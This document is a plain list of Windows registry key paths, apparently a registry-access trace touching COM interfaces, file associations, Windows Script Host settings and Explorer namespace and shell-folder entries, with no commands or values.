HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{000214E2-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E2-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{00000114-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000114-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{00000114-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E3-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{000214E3-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E3-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\TypeLib
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell
HKEY_CURRENT_USER\Software\Classes\exefile\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open
HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CURRENT_USER\Software\Classes\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CURRENT_USER\Software\Classes\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_CURRENT_USER\Software\Classes\.asp
HKEY_CLASSES_ROOT\.bas
HKEY_CURRENT_USER\Software\Classes\.bas
HKEY_CLASSES_ROOT\.bat
HKEY_CURRENT_USER\Software\Classes\.bat
HKEY_CLASSES_ROOT\.cer
HKEY_CURRENT_USER\Software\Classes\.cer
HKEY_CLASSES_ROOT\.chm
HKEY_CURRENT_USER\Software\Classes\.chm
HKEY_CLASSES_ROOT\.cmd
HKEY_CURRENT_USER\Software\Classes\.cmd
HKEY_CLASSES_ROOT\.com
HKEY_CURRENT_USER\Software\Classes\.com
HKEY_CLASSES_ROOT\.cpl
HKEY_CURRENT_USER\Software\Classes\.cpl
HKEY_CLASSES_ROOT\.crt
HKEY_CURRENT_USER\Software\Classes\.crt
HKEY_CLASSES_ROOT\.csh
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\setup\PnpLockdownFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\OfficeClickToRun.exe
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\WScript.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\JSFile\ScriptEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_CURRENT_USER\Software\Classes\JScript
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_CURRENT_USER\Software\Classes\new
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\new\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\new\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\9
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\WScript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{98D99750-0B8A-4c59-9151-589053683D73}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{98D99750-0B8A-4c59-9151-589053683D73}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F3F5824C-AD58-4728-AF59-A1EBE3392799}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
